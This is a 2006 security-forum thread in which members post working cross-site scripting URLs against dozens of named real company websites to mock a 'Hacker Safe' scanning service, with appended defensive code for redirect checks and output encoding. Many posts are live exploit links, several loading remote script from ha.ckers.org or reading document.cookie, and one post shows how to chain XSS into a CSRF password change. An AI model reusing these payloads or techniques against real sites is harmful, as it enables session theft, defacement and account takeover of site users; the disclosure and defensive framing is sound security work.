Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 2 of 3
Re: Hacker safe!
Posted by: jungsonn
Date: November 11, 2006 03:56AM

At least Johnson & Johnson http://www.jnj.com/exit_warning.jsp?url=http%3A//SLA.CKERS.ORG has sla.ckers on its lame-ass map.

Re: Hacker safe!
Posted by: rsnake
Date: November 11, 2006 04:00AM

http://www.jnj.com/exit_warning.jsp?url=http%3A//www.asdf.com?%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: Kyran
Date: November 11, 2006 04:00AM

http://www.jnj.com/exit_warning.jsp?url=http%3A//xss%22%3E%3Cscript%3Ealert('xss')%3C/script%3E XSS on that page too! :P

Beat me to it by a second. :(

- Kyran

Re: Hacker safe!
Posted by: jungsonn
Date: November 11, 2006 04:01AM

Excellent! aww!

Re: Hacker safe!
Posted by: maluc
Date: November 11, 2006 06:13AM

Quote
A&E Television Networks, Ace Hardware, American Red Cross, Fidelity National Financial, General Nutrition Centers, HP, Johnson & Johnson, NIKE, Northrop Grumman, PETCO, Ritz Camera, Sony, The Sports Authority, The World Bank, U-Haul, Visa, Warner Brothers, and Yahoo. None of these companies were found to have vulnerabilities by sla.ckers.org.
Kelly Jackson Higgins

says who?

http://www.aetv.com/search/global.do?keywords=%3Cscript%3Ealert%28%223%20XSS%22%29%3C%2Fscript%3E%3Cx
http://www.acehardware.com/corp/index.jsp?page=storeLocator&locationCode=14320&state=';alert('XSS');//
http://www.redcross.org/search/search.asp?queryaction=results&selecteddatabases=AllSite&SearchString=asdf%22%3E%3Cbody%0Aonload=%22alert('XSS')%22%3E%3Cx
http://www.investor.fnf.com/search.cfm?keyword=%22%3E%3Cbody%20onload=%22alert('XSS')%22%3E%3Cx
http://www.gnc.com/corp/index.jsp?page=storeLocator&locationCode=631&state=';alert('XSS');//
http://www.hp.com/cgi-bin/pf-new.cgi?IN=http://www.%3Cbody%20onload%3Dalert('XSS')%3E
http://www.jnj.com/contact_us/index.htm?pageTemplate=--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx
http://www.nike.com/nikebiz/nikebiz.jhtml?page=32;alert('XSS');//
http://investor.northropgrumman.com/phoenix.zhtml?c=112386&p=irol-Guestbook&UniqueId=','');alert('XSS0')//&pdp=%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss');xx:expression(alert('XSS1'))%22
http://www.petco.com/petco_Page_PC_storelocator_nav_2.aspx?cm_re=102605-_-hdr-_-locasdf');alert('XSS');//
http://www.ritzcamera.com/webapp/wcs/stores/servlet/TrackOrderStatus?storeId=10001&catalogId=%22;alert('XSS');//e1
http://b2b.sony.com/Solutions/search.do?search=asdf');alert('2%20XSS
http://www.sportsauthority.com/helpdesk/index.jsp?display=returns&subdisplay=returns&clickid=%22;alert(%222%20XSS%22);//
http://extsearch.worldbank.org/servlet/SiteSearchServlet?q=asdf%22;alert(%222%20XSS%22);//
http://reservations.uhaul.com/(ybwu5245eaeyra45xar2piah)/Default.aspx?refer=finderasdf%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%22 FF only
http://www.visacemea.com/?country=');alert('XSS');// sorry. visa.com was unpossible. this is their eastern europe domain
http://www2.warnerbros.com/all/campaign/makeCookie.html?cid=1&url=javascript:alert(%22XSS%22%29
http://us.f275.mail.yahoo.com/dc/fc?l=1&f=1&p=1&bg=F4F5FB;width:%20expression(alert(document.cookie));-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss%29

-maluc

Re: Hacker safe!
Posted by: jungsonn
Date: November 11, 2006 09:41AM

Haha, nice job. I tried VISA also, haven't found anything yet, they're using mostly plain html (which they should). ^-^

Re: Hacker safe!
Posted by: maluc
Date: November 11, 2006 10:55AM

well nothing is impossible i guess..

http://www.usa.visa.com/cardadvisor/CardAdvisorSearch?QB1=%22%3E%3Cscript%3Ealert(%22XSS0%22)%3C/script%3E%3Cx&QB2=%22%3E%3Cscript%3Ealert(%22XSS1%22)%3C/script%3E%3Cx&QB3=%22%3E%3Cscript%3Ealert(%22XSS2%22)%3C/script%3E%3Cx&QB4=%22%3E%3Cscript%3Ealert(%22XSS3%22)%3C/script%3E%3Cscript%20defer%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E%3Cx&QB5=2&categoryId=2

Edit: forgot to add defer :x

-maluc

Re: Hacker safe!
Posted by: WhiteAcid
Date: November 11, 2006 01:03PM

At first look that looks like all of them.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Hacker safe!
Posted by: rsnake
Date: November 11, 2006 01:55PM

Wow! That's incredible. Not totally unexpected, but still, pretty amazing. Nice job, Maluc. That's a pretty solid argument you've made.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: jungsonn
Date: November 11, 2006 02:02PM

Yep, job done. Still I wonder what ScanAlert's answer on it meant: "We encourage them". It's a pity, I really want to inject some SQL at such sites, and go beyond the web-application layer to disprove them at least on the first 3 scan levels, but that's a bridge too far for me.

After reading the whitepaper of ScanAlert, and the methods they use, I get more questions every time I read it than good answers, like they say something like: "Hacker safe doesn't need to be installed on the server, it does it remote." So essentially it's a small "Dos" app that is pinging ports, firewall, and other snake-oil tactics, 'cause most servers have only a few open ports these days, we're not in the telnet era anymore.

But I wonder, if they do it remote, then they only scan the web application layer, 'cause how is it going to cross the firewall to do some REAL penetration testing? Pity those guys aren't here to answer the questionnaire.

Re: Hacker safe!
Posted by: rsnake
Date: November 11, 2006 02:13PM

From one of our anonymous lurkers:

Easy to find XSS in Scan Alert customer websites

Interstate Batteries
http://www.interstatebatteries.com/estore/search.asp?N=0&Ntk=SearchGroup&Ntt=%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&Nty=0&D=HHHHH&Ntx=mode+matchallany&Dx=mode+matchallany&Ns=product+Type%7c0%7C%7CRank%7C1&Nu=Part+Number&searchtype=Y&mscssid=3E70X9M09F198M0T9UVQVFP7N6G07KJB

Fredericks of Hollywood
https://secureweb.fredericks.com/packageTrack.asp?txtorderNum=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&hdnRetSubmit=1&image1.x=83&image1.y=14

ABES of Maine
http://www.abesofmaine.com/search.asp?noresults=1&qu=%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

Illuminations
http://www.illuminations.com/shopping/search/searchresultsmain.jsp?fresh=1&searchType=advanced&attribute14=0&attribute15=0&attribute16=0&RS=1&keyword=%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

A&E Entertainment
http://www.aetv.com/search/global.do?keywords=%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

Yankee Candle
http://www.yankeecandle.com/cgi-bin/ycbvp/searchResults.jsp?search=TEST%22);%0aalert(%22Not%20So%20Hacker%20Safe%22);%0afoo(%22

PacSun
http://search.pacsun.com/?query=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&queryTxt=

Cabela's
http://www.cabelas.com/cabelas/en/common/search/search-results1.jsp?QueryText=%22%3E%3Cscript%3Ealert(%22NoSoHacker%20Safe%22)%3C/script%3E

KitchenAid
http://www.shopkitchenaid.com/product_list.asp?HDR=search&SEARCH=G%22%0aalert(%22Not%20So%20Hacker%20Safe%22)%0avar%20x%20%3d%22

Lilian Vernon
http://search.lillianvernon.com/EasyAsk/lillianvernon/results.jsp?form_state=search&dct=lvernon&indexed=1&disp=html&RequestAction=advisor&RequestData=CA_Search&oneshot=1&UseSheet=&ResultsPerPage=9&submitted=yes&cartItemCount=0&currentSearchBox=question&btnRadio=1&question=AAAAAA%3Cimg%20src=%22%22%20onerror=%22alert('Not%20So%20Hacker%20Safe')%22%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: sjensen
Date: November 11, 2006 09:32PM

https://shop.2checkout.com/2co/

search: "><script>alert('xss');</script>

http://www.haveninternet.com/search.html

search: <script>alert('xss');</script>

https://www06.sbc.com/myaccount/Controller?pf=frameworkEntry&e=feMyAccount

UserID: "><script>alert('xss');</script>

Re: Hacker safe!
Posted by: jungsonn
Date: November 12, 2006 02:54AM

https://www.haworthpress.com/store/product.asp?sid=%22%3E%3Cscript%3Ealert('Thanks+for+shopping+safely!!!+please+drive+thru.+the+XSS-team')%3C/script%3E&sku=J103

http://www.shoplet.com/office/cgi-bin/search8.php?mode=all&key=%3E%22%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

Re: Hacker safe!
Posted by: maluc
Date: November 13, 2006 10:43PM

Well it seems Visa webmasters don't work on the weekends, but they fixed both of those holes on the same day they found out about it.. their track record is still some of the speediest I've seen.

so a tip of the hat to them..

-maluc

Re: Hacker safe!
Posted by: jungsonn
Date: November 14, 2006 02:42AM

Yes, seems fixed. I also like how they protect the URL breadcrumb structure with those pipes | and also the redirect protection where they check the given URL and render it "phishing" if not matched. I have not tried to obfuscate it with all methods, and maybe it will fail on such a thing: "http://visa.com@DWORD/phishing.php" or such; that's hard to match unless they use whitelisting.

Re: Hacker safe!
Posted by: maluc
Date: November 14, 2006 02:59AM

They do use whitelisting, by domain. They previously whitelisted google.com and since google has an open redirect.. it left them an indirect open redirect http://sla.ckers.org/forum/read.php?3,505,1424#msg-1424

Still just as useful for phishing. But any other whitelisted domain with either an open redirect or an XSS hole (like infonow.net) can turn it back into an open redirect. Although perhaps less effective since XSS ones will usually make the XSS'd page appear briefly before execution.

-maluc

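The redirect check the two posts above are discussing, as an added example (not Visa's own code, and not from the thread): an exit-warning page that allowlists by the parsed hostname rather than by substring, so the "http://visa.com@DWORD/..." form jungsonn mentions is rejected, and that deliberately does not allowlist whole domains, because any open redirect or XSS on an allowlisted domain re-opens the redirect as maluc notes. The allowlist entries and sample targets are constructed.

```javascript
// Added example, not visa.com's implementation: an exit-redirect check that
// allowlists by parsed hostname instead of by substring match.
const ALLOWED_HOSTS = ["visa.com", "www.visa.com"]; // constructed allowlist

// True only for an absolute http(s) URL whose hostname is exactly one of the
// allowlisted hosts. No subdomain or whole-domain matching on purpose:
// allowlisting a large domain re-opens the redirect through any open
// redirect or XSS on that domain (the google.com case discussed above).
function isAllowedRedirect(target, allowedHosts = ALLOWED_HOSTS) {
  let url;
  try {
    url = new URL(target);            // throws on relative or malformed input
  } catch (e) {
    return false;
  }
  // Reject javascript:, data:, ftp: and similar schemes outright.
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  // "http://visa.com@203.0.113.5/": the text before "@" is userinfo, not the
  // host. A legitimate exit link never carries credentials, so reject them.
  if (url.username !== "" || url.password !== "") return false;
  // url.hostname is already lower-cased; a numeric (DWORD) host is either
  // normalised to dotted-quad form by the parser or fails to parse above.
  return allowedHosts.includes(url.hostname);
}

// Constructed sample targets; 203.0.113.5 is a documentation-only address.
const SAMPLE_TARGETS = [
  "https://www.visa.com/cardadvisor/",
  "http://visa.com@203.0.113.5/phishing.php",   // userinfo trick
  "http://3405803781/phishing.php",             // 203.0.113.5 as one DWORD
  "http://www.visa.com.example.net/",           // look-alike suffix
  "javascript:alert(document.cookie)",
  "/relative/path",
];

// What the exit page should do for each target: follow it, or show the
// "phishing" warning page instead.
function classify(targets = SAMPLE_TARGETS) {
  const verdicts = {};
  for (const t of targets) {
    verdicts[t] = isAllowedRedirect(t) ? "redirect" : "show phishing warning";
  }
  return verdicts;
}
```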
Re: Hacker safe!
Posted by: digi7al64
Date: November 14, 2006 03:45AM

http://search.ridegear.com/?q=</title><script>alert('xss')</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Hacker safe!
Posted by: adio_skater69
Date: November 16, 2006 10:47PM

control scan and hacker safe are stupid companies that think they know code.


btw, can you do anything besides make JavaScript alerts on Hacker Safe sites? Insert some content into it! I would if I could code JS! (I'm savvy in C++, HTML, CSS, etc.)

Re: Hacker safe!
Posted by: jungsonn
Date: November 17, 2006 06:33AM

Sure, it's possible.

Though the simple XSS alert is only to show the proof of concept. RSnake has some scripts to "pseudo deface" a site when the script executes from the URI, some do post it here now and then. Never seen it? It's pretty funny.

Re: Hacker safe!
Posted by: maluc
Date: November 17, 2006 10:54AM

Well both companies are essentially a Nessus scan (or Nessus clone).. they look for flaws in 3rd party web applications.. and web servers/FTP servers. What they don't seem to do is look for web app holes (XSS, SQL, PHP injections) in custom web pages like the ones the site's webmaster personally made. Acunetix's WebScanner does find those holes.. but it seems to not be too thorough since their own website has had multiple XSS vulnerabilities.

ScanAlert is certainly in the wrong here. They claim to find XSS/SQL holes when they certainly do a poor job of it - I've yet to see a site that uses them which is free from XSS. Control Code, however, is pretty upfront that they're a repackaged Nessus scan and therefore don't find custom web app flaws - so they should escape some of that blame.

And unfortunately, the bulk of their clients are mom and pop websites - where the neighbor's son who's good with computers is their web master.. Even when they notify them of flaws, they're likely not able to fix things more complicated than 'download the new version' fixes. Hell, most professional web designers and sysadmins don't know how to properly sanitize web apps - they know how to reinstall Windows, run nmap, and add banned IPs to firewalls =.=

-maluc

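The fix that the whole list of reflected-XSS links in this thread calls for, and that the post above says most web designers don't know how to apply, as an added example (not code from the thread or from any vendor named in it): context-aware output encoding. Every link above is a request parameter written into the page without encoding for the spot it lands in (HTML text, an attribute value, or a JavaScript string literal), so the encoder has to match that spot. The sample inputs are constructed from the payload shapes quoted in the thread.

```javascript
// Added example: encode a reflected parameter for the context it lands in.

// HTML text nodes and quoted attribute values: encode the five metacharacters.
function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Inside a JavaScript string literal (var q = '...'): escape every character
// outside [A-Za-z0-9], so quotes, backslashes, newlines and "</script>" can
// neither end the literal nor end the enclosing <script> block.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? "\\x" + code.toString(16).padStart(2, "0")
                        : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// A search-results page like the ones linked above, rendered with the right
// encoder for each of the three places the keyword is echoed.
function renderSearchPage(keywords) {
  return [
    `<title>Results for ${encodeHtml(keywords)}</title>`,
    `<input name="keywords" value="${encodeHtml(keywords)}">`,
    `<script>var lastQuery = '${encodeJsString(keywords)}';</script>`,
  ].join("\n");
}

// Count matches of a pattern; the page is intact when the only <script> and
// </title> are the ones the template wrote and the <input> tag is not cut short.
function countTag(page, pattern) {
  return (page.match(new RegExp(pattern, "gi")) || []).length;
}

// Constructed inputs modelled on payload shapes quoted in this thread.
const SAMPLE_INPUTS = [
  "\"><script>alert('xss')</script>",            // closes an attribute, adds a tag
  "</title><script>alert('xss')</script>",       // breaks out of <title>
  "';alert('XSS');//",                           // breaks out of a JS string
  "TEST\");\nalert(\"Not So Hacker Safe\");\nfoo(\"", // newline inside a JS call
];
```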
Re: Hacker safe!
Posted by: maluc
Date: November 17, 2006 10:56AM

and yes, the script RSnake made for it is using:
<script src=http://ha.ckers.org/s.js></script>

-maluc

Re: Hacker safe!
Posted by: adam
Date: November 28, 2006 04:40PM

"pseudo deface"

so what exactly does that do?

adam

Re: Hacker safe!
Posted by: maluc
Date: November 28, 2006 05:01PM

It overwrites the document that the victim sees generated by their browser..
using the equivalent of
<script>document.body.innerHTML='new page html'</script>

So it's only modifying what the victim sees client-side. Nothing is rewritten on the web server itself. That is, unless you send commands to it with the victim's access level using CSRF. For example, sending a request to 'Change Password to spaghetti' by injecting an iframe
<script>document.body.innerHTML='new page<iframe src="http://thatsite.com/changepass.php?newpass=spaghetti&confirm=spaghetti"></iframe>'</script>

So using that Stallowned page, you didn't actually 'hack' any server as nothing was changed on it and you didn't have root access to it. The legality of it is quite controversial right now.

-maluc

Re: Hacker safe!
Posted by: apnovi
Date: December 04, 2006 05:20PM

http://www.lockpickshop.com/Merchant2/merchant.mvc?Screen=%3Ciframe%20src=%22www.lockpickshop.com%22%3E

Re: Hacker safe!
Posted by: eyeced
Date: December 18, 2006 05:17PM

Haven't any XSS to add, I just thought I'd also like to say that overall, in comparison to most boards, there are a lot of very skilled people on here and it feels good to be part of such a knowledgeable community of people that have the same interest and actually know what they're talking about.

Re: Hacker safe!
Posted by: maluc
Date: December 18, 2006 05:48PM

Thanks.. and might I say your lips feel quite nice upon my bum. And so deserving after recently being honored as Time magazine's Man of The Year.. ^^


But you're right, I'm quite pleased with the quality of discussion here. Although it may've slowed my productivity for the worse, I think it's a vital resource for the community - who probably, like me, don't enjoy sifting through all the useless crap clogging other sec forums .-.

Kinda surprising considering this forum is unmoderated.. hope it lasts.

-maluc

Re: Hacker safe!
Posted by: Kyran
Date: December 18, 2006 06:02PM

Come to think of it...this forum has maintained its integrity with little or no moderation. I bet RSnake has some super secret script running to save us from spam and idiots.

if(user == idiot){
doBan(user)
}

?

- Kyran

Re: Hacker safe!
Posted by: rsnake
Date: December 19, 2006 03:13PM

Yah, it's called laziness.sh. Here's the pseudocode:

use email->verification;

if (someone_posts) {
read $it['sometime_later'];
do nothing;
}

if (post_ends_up_annoying_me) {
delete $it;
} elsif (post_ends_up_in_my_inbox_cuz_it_annoyed_someone_else) {
delete $it;
ban $ip;
if (got_nothing_better_to_do == true) {
plan->retribution_on($ip);
}
}

It's rough, but it works. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: digi7al64
Date: December 26, 2006 07:41PM

http://www.roomstogo.com/

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Hacker safe!
Posted by: nEUrOO
Date: December 27, 2006 04:52PM

http://www.shoppbs.org/searchHandler/index.jsp?keywords=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=11&y=11

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher
